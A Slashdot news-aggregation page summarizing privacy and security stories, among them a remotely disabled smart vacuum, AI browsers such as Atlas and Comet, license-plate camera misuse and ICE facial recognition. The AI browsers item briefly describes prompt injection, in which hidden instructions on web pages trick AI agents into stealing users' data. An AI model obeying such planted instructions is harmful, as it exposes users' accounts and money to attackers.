Privacy

Manufacturer Remotely Bricks Smart Vacuum After Its Owner Blocked It From Collecting Data (tomshardware.com) 123

"An engineer got curious about how his iLife A11 smart vacuum worked and monitored the network traffic coming from the device," writes Tom's Hardware.

"That's when he noticed it was constantly sending logs and telemetry data to the manufacturer — something he hadn't consented to." The user, Harishankar, decided to block the telemetry servers' IP addresses on his network, while keeping the firmware and OTA servers open. While his smart gadget worked for a while, it just refused to turn on soon after... He sent it to the service center multiple times, wherein the technicians would turn it on and see nothing wrong with the vacuum. When they returned it to him, it would work for a few days and then fail to boot again... [H]e decided to disassemble the thing to determine what killed it and to see if he could get it working again...

[He discovered] a GD32F103 microcontroller to manage its plethora of sensors, including Lidar, gyroscopes, and encoders. He created PCB connectors and wrote Python scripts to control them with a computer, presumably to test each piece individually and identify what went wrong. From there, he built a Raspberry Pi joystick to manually drive the vacuum, proving that there was nothing wrong with the hardware. From this, he looked at its software and operating system, and that's where he discovered the dark truth: his smart vacuum was a security nightmare and a black hole for his personal data.

First of all, it's Android Debug Bridge, which gives him full root access to the vacuum, wasn't protected by any kind of password or encryption. The manufacturer added a makeshift security protocol by omitting a crucial file, which caused it to disconnect soon after booting, but Harishankar easily bypassed it. He then discovered that it used Google Cartographer to build a live 3D map of his home. This isn't unusual, by far. After all, it's a smart vacuum, and it needs that data to navigate around his home. However, the concerning thing is that it was sending off all this data to the manufacturer's server. It makes sense for the device to send this data to the manufacturer, as its onboard SoC is nowhere near powerful enough to process all that data. However, it seems that iLife did not clear this with its customers.

Furthermore, the engineer made one disturbing discovery — deep in the logs of his non-functioning smart vacuum, he found a command with a timestamp that matched exactly the time the gadget stopped working. This was clearly a kill command, and after he reversed it and rebooted the appliance, it roared back to life.

Thanks to long-time Slashdot reader registrations_suck for sharing the article.
AI

Do AI Browsers Exist For You - or To Give AI Companies Data? (fastcompany.com) 39

"It's been hard for me to understand why Atlas exists," writes MIT Technology Review. " Who is this browser for, exactly? Who is its customer? And the answer I have come to there is that Atlas is for OpenAI. The real customer, the true end user of Atlas, is not the person browsing websites, it is the company collecting data about what and how that person is browsing."

New York Magazine's "Intelligencer" column argues OpenAI wants ChatGPT in your browser because "That's where people who use computers, particularly for work, spend all their time, and through which vast quantities of valuable information flow in and out. Also, if you're a company hoping to train your models to replicate a bunch of white-collar work, millions of browser sessions would be a pretty valuable source of data."

Unfortunately, warns Fast Company, ChatGPT Atlas, Perplexity Comet, and other AI browses "include some major security, privacy, and usability trade-offs... Most of the time, I don't want to use them and am wary of doing so..." Worst of all, these browsers are security minefields. A web page that looks benign to humans can includehidden instructions for AI agents, tricking them into stealing info from other sites... "If you're signed into sensitive accounts like your bank or your email provider in your browser, simply summarizing a Reddit postcould result in an attacker being able to steal money or your private data,"Brave's security researchers wrotelast week.No one has figured out how to solve this problem.

If you can look past the security nightmares, the actual browsing features are substandard. Neither ChatGPT Atlas nor Perplexity Comet support vertical tabs — a must-have feature for me — and they have no tab search tool or way to look up recently-closed pages. Atlas also doesn't support saving sites as web apps, selecting multiple tabs (for instance, to close all at once with Cmd+W), or customizing the appearance. Compared to all the fancy new AI features, the web browsing part can feel like an afterthought. Regular web search can also be a hassle, even though you'll probably need it sometimes. When I typed "Sichuan Chili" into ChatGPT Atlas, it produced a lengthy description of the Chinese peppers, not the nearby restaurant whose website and number I was looking for.... Meanwhile, the standard AI annoyances still apply in the browser. Getting Perplexity to fill my grocery cart felt like a triumph, but on other occasions the AI has run into inexplicable walls and only ended up wasting more time.

There may be other costs to using these browsers as well. AI still has usage limits, and so all this eventually becomes a ploy to bump more people into paid tiers. Beyond that,Atlas is constantly analyzing the pages you visit to build a "memory" of who you are and what you're into. Do not be surprised if this translates to deeply targeted ads as OpenAI startslooking at ways to monetize free users. For now, I'm only using AI browsers in small doses when I think they can solve a specific problem.

Even then, I'm not going sign them into my email, bank accounts, or any other accounts for which a security breach would be catastrophic. It's too bad, because email and calendars are areas where AI agents could be truly useful, but the security risks are too great (andwell-documented).

The article notes that in August Vivaldi announced that "We're taking a stand, choosing humans over hype" with their browser: We will not use an LLM to add a chatbot, a summarization solution or a suggestion engine to fill up forms for you, until more rigorous ways to do those things are available. Vivaldi is the haven for people who still want to explore. We will continue building a browser for curious minds, power users, researchers, and anyone who values autonomy. If AI contributes to that goal without stealing intellectual property, compromising privacy or the open web, we will use it. If it turns people into passive consumers, we will not...

We're fighting for a better web.

Privacy

Woman Wrongfully Accused by a License Plate-Reading Camera - Then Exonerated By Camera-Equipped Car (electrek.co) 174

CBS News investigates what happened when police thought they'd tracked down a "porch pirate" who'd stolen a package — and accused an innocent woman.

"You know why I'm here," the police sergeant tells Chrisanna Elser. "You know we have cameras in that town..." "It went right into, 'we have video of you stealing a package,'" Elser said... "Can I see the video?" Elser asked. "If you go to court, you can," the officer replied. "If you're going to deny it, I'm not going to extend you any courtesy...." [You can watch a video of the entire confrontation.] On her doorstep, the officer issued a summons, without ever looking at the surveillance video Elser had. "We can show you exactly where we were," she told him. "I already know where you were," he replied.

Her Rivian — equipped with multiple cameras — had recorded her entire route that day... It took weeks of her collecting her own evidence, building timelines, and submitting videos before someone listened. Finally, she received an email from the Columbine Valley police chief acknowledging her efforts in an email saying, "nicely done btw (by the way)," and informing her the summons would not be filed.

Elser also found the theft video (which the police officer refused to show her) on Nextdoor, reports Electrek. "The woman has the same color hair, but different facial and nose shape and apparent age than Elser, which is all reasonably apparent when viewing the video..."

But Elser does drive a green Rivian truck, which police knew had entered the neighborhood 20 times over the course of a month. (Though in the video the officer is told that a male driver in the same household passes through that neighborhood driving to and from work.) The problem may be their certainty — derived from Flock's network of cameras that automatically read license plates, "tracking movements of vehicles wherever they go..." The system has provoked concern from privacy and freedom focused organizations like the Electronic Frontier Foundation and American Civil Liberties Union. Flock also recently announced a partnership with Ring, seeking to use a network of doorbell cameras to track Americans in even more places.... [The police] didn't even have video of the truck in the area — merely tags of it entering... (it also left the area minutes later, indicating a drive through, rather than crawling through neighborhoods looking for packages — but police neglected to check the exit timestamps)... Elser has asked for an apology for [officer] Milliman's aggressive behavior during the encounter, but has heard nothing back from the department despite a call, email, and physical appearance at the police station.
The article points out that Rivian's "Road Cam" feature can be set to record footage of everything happening around it using the car's built in cameras for driver-assist features. But if you want to record footage all the time, you'll need to plug in a USB-C external drive to store it. (It's ironic how different cameras recorded every part of this story — the theft, the police officer accusing the innocent woman, and that innocent woman's actual whereabouts.)

Electrek's take? "Citizens should not need to own a $70k+ truck, or even a $100 external hard drive, to keep track of everything they do in order to prove to power-tripping officers that they didn't commit a crime."
EU

Austria's Ministry of Economy Has Migrated To a Nextcloud Platform In Shift Away From US Tech (zdnet.com) 10

An anonymous reader quotes a report from ZDNet: Even before Azure had a global failure this week, Austria's Ministry of Economy had taken a decisive step toward digital sovereignty. The Ministry achieved this status by migrating 1,200 employees to a Nextcloud-based cloud and collaboration platform hosted on Austrian-based infrastructure. This shift away from proprietary, foreign-owned cloud services, such as Microsoft 365, to an open-source, European-based cloud service aligns with a growing trend among European governments and agencies. They want control over sensitive data and to declare their independence from US-based tech providers.

European companies are encouraging this trend. Many of them have joined forces in the newly created non-profit foundation, the EuroStack Initiative. This foundation's goal is " to organize action, not just talk, around the pillars of the initiative: Buy European, Sell European, Fund European." What's the motive behind these moves away from proprietary tech? Well, in Austria's case, Florian Zinnagl, CISO of the Ministry of Economy, Energy, and Tourism (BMWET), explained, "We carry responsibility for a large amount of sensitive data -- from employees, companies, and citizens. As a public institution, we take this responsibility very seriously. That's why we view it critically to rely on cloud solutions from non-European corporations for processing this information."

Austria's move and motivation echo similar efforts in Germany, Denmark, and other EU states and agencies. The organizations include the German state of Schleswig-Holstein, which abandoned Exchange and Outlook for open-source programs. Other agencies that have taken the same path away from Microsoft include the Austrian military, Danish government organizations, and the French city of Lyon. All of these organizations aim to keep data storage and processing within national or European borders to enhance security, comply with privacy laws such as the EU's General Data Protection Regulation (GDPR), and mitigate risks from potential commercial and foreign government surveillance.

Privacy

Denmark Reportedly Withdraws 'Chat Control' Proposal Following Controversy (therecord.media) 28

An anonymous reader quotes a report from The Record: Denmark's justice minister on Thursday said he will no longer push for an EU law requiring the mandatory scanning of electronic messages, including on end-to-end encrypted platforms. Earlier in its European Council presidency, Denmark had brought back a draft law which would have required the scanning, sparking an intense backlash. Known as Chat Control, the measure was intended to crack down on the trafficking of child sex abuse materials (CSAM). After days of silence, the German government on October 8 announced it would not support the proposal, tanking the Danish effort.

Danish Justice Minister Peter Hummelgaard told reporters on Thursday that his office will support voluntary CSAM detections. "This will mean that the search warrant will not be part of the EU presidency's new compromise proposal, and that it will continue to be voluntary for the tech giants to search for child sexual abuse material," Hummelgaard said, according to local news reports. The current model allowing for voluntary scanning expires in April, Hummelgaard said. "Right now we are in a situation where we risk completely losing a central tool in the fight against sexual abuse of children," he said. "That's why we have to act no matter what. We owe it to all the children who are subjected to monstrous abuse."

United States

You Can't Refuse To Be Scanned by ICE's Facial Recognition App, DHS Document Says (404media.co) 202

An anonymous reader shares a report: Immigration and Customs Enforcement (ICE) does not let people decline to be scanned by its new facial recognition app, which the agency uses to verify a person's identity and their immigration status, according to an internal Department of Homeland Security (DHS) document obtained by 404 Media. The document also says any face photos taken by the app, called Mobile Fortify, will be stored for 15 years, including those of U.S. citizens.

The document provides new details about the technology behind Mobile Fortify, how the data it collects is processed and stored, and DHS's rationale for using it. On Wednesday 404 Media reported that both ICE and Customs and Border Protection (CBP) are scanning peoples' faces in the streets to verify citizenship.

"ICE does not provide the opportunity for individuals to decline or consent to the collection and use of biometric data/photograph collection," the document, called a Privacy Threshold Analysis (PTA), says. A PTA is a document that DHS creates in the process of deploying new technology or updating existing capabilities. It is supposed to be used by DHS's internal privacy offices to determine and describe the privacy risks of a certain piece of tech. "CBP and ICE Privacy are jointly submitting this new mobile app PTA for the ICE Mobile Fortify Mobile App (Mobile Fortify app), a mobile application developed by CBP and made accessible to ICE agents and officers operating in the field," the document, dated February, reads. 404 Media obtained the document (which you can see here) via a Freedom of Information Act (FOIA) request with CBP.

Cellphones

Someone Snuck Into a Cellebrite Microsoft Teams Call and Leaked Phone Unlocking Details (404media.co) 56

An anonymous reader quotes a report from 404 Media: Someone recently managed to get on a Microsoft Teams call with representatives from phone hacking company Cellebrite, and then leaked a screenshot of the company's capabilities against many Google Pixel phones, according to a forum post about the leak and 404 Media's review of the material. The leak follows others obtained and verified by 404 Media over the last 18 months. Those leaks impacted both Cellebrite and its competitor Grayshift, now owned by Magnet Forensics. Both companies constantly hunt for techniques to unlock phones law enforcement have physical access to.

"You can Teams meeting with them. They tell everything. Still cannot extract esim on Pixel. Ask anything," a user called rogueFed wrote on the GrapheneOS forum on Wednesday, speaking about what they learned about Cellebrite capabilities. GrapheneOS is a security- and privacy-focused Android-based operating system. rogueFed then posted two screenshots of the Microsoft Teams call. The first was a Cellebrite Support Matrix, which lays out whether the company's tech can, or can't, unlock certain phones and under what conditions. The second screenshot was of a Cellebrite employee. According to another of rogueFed's posts, the meeting took place in October. The meeting appears to have been a sales call. The employee is a "pre sales expert," according to a profile available online.

The Support Matrix is focused on modern Google Pixel devices, including the Pixel 9 series. The screenshot does not include details on the Pixel 10, which is Google's latest device. It discusses Cellebrite's capabilities regarding 'before first unlock', or BFU, when a piece of phone unlocking tech tries to open a device before someone has typed in the phone's passcode for the first time since being turned on. It also shows Cellebrite's capabilities against after first unlock, or AFU, devices. The Support Matrix also shows Cellebrite's capabilities against Pixel devices running GrapheneOS, with some differences between phones running that operating system and stock Android. Cellebrite does support, for example, Pixel 9 devices BFU. Meanwhile the screenshot indicates Cellebrite cannot unlock Pixel 9 devices running GrapheneOS BFU. In their forum post, rogueFed wrote that the "meeting focused specific on GrapheneOS bypass capability." They added "very fresh info more coming."

Privacy

Mother Describes the Dark Side of Apple's Family Sharing (wired.com) 140

An anonymous reader quotes a report from 9to5Mac: A mother with court-ordered custody of her children has described how Apple's Family Sharing feature can be weaponized by a former partner. Apple support staff were unable to assist her when she reported her former partner using the service in controlling and coercive ways... [...] Namely, Family Sharing gives all the control to one parent, not to both equally. The parent not identified as the organizer is unable to withdraw their children from this control, even when they have a court order granting them custody. As one woman's story shows, this can allow the feature which allows it to be weaponized by an abusive former partner.

Wired reports: "The lack of dual-organizer roles, leaving other parents effectively as subordinate admins with more limited power, can prove limiting and frustrating in blended and shared households. And in darker scenarios, a single-organizer setup isn't merely inconvenient -- it can be dangerous. Kate (name changed to protect her privacy and safety) knows this firsthand. When her marriage collapsed, she says, her now ex-husband, the designated organizer, essentially weaponized Family Sharing. He tracked their children's locations, counted their screen minutes and demanded they account for them, and imposed draconian limits during Kate's custody days while lifting them on his own [...] After they separated, Kate's ex refused to disband the family group. But without his consent, the children couldn't be transferred to a new one. "I wrongly assumed being the custodial parent with a court order meant I'd be able to have Apple move my children to a new family group, with me as the organizer," says Kate. But Apple couldn't help. Support staff sympathized but said their hands were tied because the organizer holds the power."
Although users can "abandon the accounts and start again with new Apple IDs," the report notes that doing so means losing all purchased apps, along with potentially years' worth of photos and videos.
Firefox

Firefox Plans Smarter, Privacy-First Search Suggestions In Your Address Bar (nerds.xyz) 26

BrianFagioli shares a report from NERDS.xyz: Mozilla is testing a new Firefox feature that delivers direct results inside the address bar instead of forcing users through a search results page. The company says the feature will use a privacy framework called Oblivious HTTP, encrypting queries so that no single party can see both what you type and who you are. Some results could be sponsored, but Mozilla insists neither it nor advertisers will know user identities. The system is starting in the U.S. and may expand later if performance and privacy benchmarks are met. Further reading: Mozilla to Require Data-Collection Disclosure in All New Firefox Extensions
Security

Ransomware Profits Drop As Victims Stop Paying Hackers (bleepingcomputer.com) 16

An anonymous reader quotes a report from BleepingComputer: The number of victims paying ransomware threat actors has reached a new low, with just 23% of the breached companies giving in to attackers' demands. With some exceptions, the decline in payment resolution rates continues the trend that Coveware has observed for the past six years. In the first quarter of 2024, the payment percentage was 28%. Although it increased over the next period, it continued to drop, reaching an all-time low in the third quarter of 2025.

One explanation for this is that organizations implemented stronger and more targeted protections against ransomware, and authorities increasing pressure for victims not to pay the hackers. [...] Over the years, ransomware groups moved from pure encryption attacks to double extortion that came with data theft and the threat of a public leak. Coveware reports that more than 76% of the attacks it observed in Q3 2025 involved data exfiltration, which is now the primary objective for most ransomware groups. The company says that when it isolates the attacks that do not encrypt the data and only steal it, the payment rate plummets to 19%, which is also a record for that sub-category.

The average and median ransomware payments fell in Q3 compared to the previous quarter, reaching $377,000 and $140,000, respectively, according to Coveware. The shift may reflect large enterprises revising their ransom payment policies and recognizing that those funds are better spent on strengthening defenses against future attacks. The researchers also note that threat groups like Akira and Qilin, which accounted for 44% of all recorded attacks in Q3 2025, have switched focus to medium-sized firms that are currently more likely to pay a ransom.
"Cyber defenders, law enforcement, and legal specialists should view this as validation of collective progress," Coveware says. "The work that gets put in to prevent attacks, minimize the impact of attacks, and successfully navigate a cyber extortion -- each avoided payment constricts cyber attackers of oxygen."
Mozilla

Mozilla to Require Data-Collection Disclosure in All New Firefox Extensions (linuxiac.com) 18

"Mozilla is introducing a new privacy framework for Firefox extensions that will require developers to disclose whether their add-ons collect or transmit user data..." reports the blog Linuxiac: The policy takes effect on November 3, 2025, and applies to all new Firefox extensions submitted to addons.mozilla.org. According to Mozilla's announcement, extension developers must now include a new key in their manifest.json files. This key specifies whether an extension gathers any personal data. Even extensions that collect nothing must explicitly state "none" in this field to confirm that no data is being collected or shared.

This information will be visible to users at multiple points: during the installation prompt, on the extension's listing page on addons.mozilla.org, and in the Permissions and Data section of Firefox's about:addons page. In practice, this means users will be able to see at a glance whether a new extension collects any data before they install it.

Programming

Does Generative AI Threaten the Open Source Ecosystem? (zdnet.com) 47

"Snippets of proprietary or copyleft reciprocal code can enter AI-generated outputs, contaminating codebases with material that developers can't realistically audit or license properly."

That's the warning from Sean O'Brien, who founded the Yale Privacy Lab at Yale Law School. ZDNet reports: Open software has always counted on its code being regularly replenished. As part of the process of using it, users modify it to improve it. They add features and help to guarantee usability across generations of technology. At the same time, users improve security and patch holes that might put everyone at risk. But O'Brien says, "When generative AI systems ingest thousands of FOSS projects and regurgitate fragments without any provenance, the cycle of reciprocity collapses. The generated snippet appears originless, stripped of its license, author, and context." This means the developer downstream can't meaningfully comply with reciprocal licensing terms because the output cuts the human link between coder and code. Even if an engineer suspects that a block of AI-generated code originated under an open source license, there's no feasible way to identify the source project. The training data has been abstracted into billions of statistical weights, the legal equivalent of a black hole.

The result is what O'Brien calls "license amnesia." He says, "Code floats free of its social contract and developers can't give back because they don't know where to send their contributions...."

"Once AI training sets subsume the collective work of decades of open collaboration, the global commons idea, substantiated into repos and code all over the world, risks becoming a nonrenewable resource, mined and never replenished," says O'Brien. "The damage isn't limited to legal uncertainty. If FOSS projects can't rely upon the energy and labor of contributors to help them fix and improve their code, let alone patch security issues, fundamentally important components of the software the world relies upon are at risk."

O'Brien says, "The commons was never just about free code. It was about freedom to build together." That freedom, and the critical infrastructure that underlies almost all of modern society, is at risk because attribution, ownership, and reciprocity are blurred when AIs siphon up everything on the Internet and launder it (the analogy of money laundering is apt), so that all that code's provenance is obscured.

AI

'Meet The People Who Dare to Say No to AI' (msn.com) 112

Thursday the Washington Post profiled "the people who dare to say no to AI," including a 16-year-old high school student in Virginia says "she doesn't want to off-load her thinking to a machine and worries about the bias and inaccuracies AI tools can produce..."

"As the tech industry and corporate America go all in on artificial intelligence, some people are holding back." Some tech workers told The Washington Post they try to use AI chatbots as little as possible during the workday, citing concerns about data privacy, accuracy and keeping their skills sharp. Other people are staging smaller acts of resistance, by opting out of automated transcription tools at medical appointments, turning off Google's chatbot-style search results or disabling AI features on their iPhones. For some creatives and small businesses, shunning AI has become a business strategy. Graphic designers are placing "not by AI" badges on their works to show they're human-made, while some small businesses have pledged not to use AI chatbots or image generators...

Those trying to avoid AI share a suspicion of the technology with a wide swath of Americans. According to a June survey by the Pew Research Center, 50% of U.S. adults are more concerned than excited about the increased use of AI in everyday life, up from 37% in 2021.

The Post includes several examples, including a 36-year-old software engineer in Chicago who uses DuckDuckGo partly because he can turn off its AI features more easily than Google — and disables AI on every app he uses. He was one of several tech workers who spoke anonymously partly out of fear that criticisms could hurt them at work. "It's become more stigmatized to say you don't use AI whatsoever in the workplace. You're outing yourself as potentially a Luddite."

But he says GitHub Copilot reviews all changes made to his employer's code — and recently produced one review that was completely wrong, requiring him to correct and document all its errors. "That actually created work for me and my co-workers. I'm no longer convinced it's saving us any time or making our code any better." And he also has to correct errors made by junior engineers who've been encouraged to use AI coding tools.

"Workers in several industries told The Post they were concerned that junior employees who leaned heavily on AI wouldn't master the skills required to do their jobs and become a more senior employee capable of training others."
Privacy

US Expands Facial Recognition at Borders To Track Non-Citizens (reuters.com) 67

The U.S. will expand the use of facial recognition technology to track non-citizens entering and leaving the country in order to combat visa overstays and passport fraud, according to a government document published on Friday. Reuters: A new regulation will allow U.S. border authorities to require non-citizens to be photographed at airports, seaports, land crossings and any other point of departure, expanding on an earlier pilot program.

Under the regulation, set to take effect on December 26, U.S. authorities could require the submission of other biometrics, such as fingerprints or DNA, it said. It also allows border authorities to use facial recognition for children under age 14 and elderly people over age 79, groups that are currently exempted. The tighter border rules reflect a broader effort by U.S. President Donald Trump to crack down on illegal immigration. While the Republican president has surged resources to secure the U.S.-Mexico border, he has also taken steps to reduce the number of people overstaying their visas.

The Internet

Browser Promising Privacy Protection Contains Malware-Like Features, Routes Traffic Through China (arstechnica.com) 16

A web browser linked to Chinese online gambling websites and downloaded millions of times routes all internet traffic through servers in China and covertly installs programs that run in the background, according to findings published by network security company Infoblox. The researchers said the Universe Browser, which advertises itself as offering privacy protection, includes features similar to malware such as key logging and surreptitious connections.

Infoblox collaborated with the United Nations Office on Drugs and Crime on the research. The investigators found links between the browser and Southeast Asia's cybercrime ecosystem, which has connections to money laundering, illegal online gambling, human trafficking and scam operations using forced labor. The browser is directly linked to BBIN, a major online gambling company that has existed since 1999. Infoblox researchers examined the Windows version of the browser and found that it checks users' locations and languages when launched, installs two browser extensions, and disables security features including sandboxing.
Security

Fake Homebrew Google Ads Push Malware Onto macOS (bleepingcomputer.com) 20

joshuark shares a report from BleepingComputer: A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. The campaign employs "ClickFix" techniques where targets are tricked into executing commands in Terminal, infecting themselves with malware. Researchers at threat hunting company Hunt.io identified more than 85 domains impersonating the three platforms in this campaign [...].

When checking some of the domains, BleepingComputer discovered that in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results. The malicious sites feature convincing download portals for the fake apps and instruct users to copy a curl command in their Terminal to install them, the researchers say. In other cases, like for TradingView, the malicious commands are presented as a "connection security confirmation step." However, if the user clicks on the 'copy' button, a base64-encoded installation command is delivered to the clipboard instead of the displayed Cloudflare verification ID.

Classic Games (Games)

Chess Influencer and Grandmaster Daniel Naroditsky Dies At 29 (chess.com) 48

U.S. Grandmaster and beloved chess commentator Daniel Naroditsky has tragically passed away at the age of 29. "The news has sent shockwaves around the chess community, which is grieving the loss of one of the most beloved and influential voices," reports Chess.com. From the report: The devastating news was first shared by Naroditsky's club, Charlotte Chess Center, on Monday, and confirmed by Chess.com with multiple sources: "It is with great sadness that we share the unexpected passing of Daniel Naroditsky. Daniel was a talented chess player, educator, and cherished member of the chess community. He was also a loving son, brother, and loyal friend. We ask for privacy for Daniel's family during this extremely difficult time. Let us honor Daniel by remembering his passion for chess and the inspiration he brought to us all."

Naroditsky, who was three weeks away from turning 30, has long been known as one of United States' most talented players. He achieved his grandmaster title at the age of 18 in 2013, and placed fifth among the highest-ranked juniors in 2015. His last FIDE-rating is 2619, which places him among the top 150 in the world, or the 17th highest-ranked in the United States. He has a peak rating of 2647 from 2017. He leaves a legacy that spans strong over-the-board competition and highly popular chess instruction and commentary on streaming platforms.

Wireless Networking

Kohler Unveils a Camera For Your Toilet (techcrunch.com) 97

Kohler has launched the Dekoda, a $599 smart toilet camera that analyzes users' waste to track hydration, gut health, and detect potential issues like blood. "It also comes with a rechargeable battery, a USB connection, and a fingerprint sensor to identify who's using the toilet," reports TechCrunch. From the report: The Dekoda is currently available for preorder, with shipments scheduled to begin on October 21. In addition to the hardware purchase fee, customers will need to pay between $70 and $156 per year for a subscription. If you're uneasy about the privacy implications of putting a camera right below your private parts, the company says, "Dekoda's sensors see down into your toilet and nowhere else." It also notes that the resulting data is secured via end-to-end encryption.
Censorship

Big Tech Sues Texas, Says Age-Verification Law Is 'Broad Censorship Regime' (arstechnica.com) 49

An anonymous reader quotes a report from Ars Technica: Texas is being sued by a Big Tech lobby group over the state's new law that will require app stores to verify users' ages and impose restrictions on users under 18. "The Texas App Store Accountability Act imposes a broad censorship regime on the entire universe of mobile apps," the Computer & Communications Industry Association (CCIA) said yesterday in a lawsuit (PDF). "In a misguided attempt to protect minors, Texas has decided to require proof of age before anyone with a smartphone or tablet can download an app. Anyone under 18 must obtain parental consent for every app and in-app purchase they try to download -- from ebooks to email to entertainment."

The CCIA said in a press release that the law violates the First Amendment by imposing "a sweeping age-verification, parental consent, and compelled speech regime on both app stores and app developers." When app stores determine that a user is under 18, "the law prohibits them from downloading virtually all apps and software programs and from making any in-app purchases unless their parent consents and is given control over the minor's account," the CCIA said. "Minors who are unable to link their accounts with a parent's or guardian's, or who do not receive permission, would be prohibited from accessing app store content."

The law requires app developers "to 'age-rate' their content into several subcategories and explain their decision in detail," and "notify app stores in writing every time they improve or modify the functions, features, or user experience of their apps," the group said. The lawsuit says the age-rating system relies on a "vague and unworkable set of age categories." "Our Constitution forbids this," the lawsuit said. "None of our laws require businesses to 'card' people before they can enter bookstores and shopping malls. The First Amendment prohibits such oppressive laws as much in cyberspace as it does in the physical world." The lawsuit was filed in US District Court for the Western District of Texas. CCIA members include Apple and Google, which have both said the law would reduce privacy for app users. The companies recently described their plans to comply, saying they would take steps to minimize the privacy risks.

Windows

Microsoft Wants You To Talk To Your PC and Let AI Control It (theverge.com) 148

Microsoft is reshaping Windows around AI, introducing capabilities that let users control their computers through voice and allow Copilot to take autonomous actions on their behalf. The company is now rolling out a "Hey, Copilot!" wake word on Windows 11 machines, positioning voice as a "third input mechanism" to supplement the keyboard and mouse.

Copilot Vision, which streams what a user sees on their screen, is rolling out globally, enabling the system to troubleshoot PC problems, help with app usage, and provide task guidance. Microsoft is simultaneously testing Copilot Actions through a limited preview, allowing the AI to take autonomous actions on local machines like editing folders of photos. The company is also integrating Copilot into the Windows taskbar and launching advertisements promoting these features, coinciding with Windows 10's end-of-support earlier this week.

Yusuf Mehdi, Microsoft's consumer chief marketing officer, said the company wants users upgrading to Windows 11 to "experience what it means to have a PC that's not just a tool, but a true partner." Microsoft attempted to popularize Cortana, a voice assistant, on Windows 10 a decade ago. Last year, the company released Recall, a feature that automatically captured screenshots, drawing criticism over privacy.

Slashdot Top Deals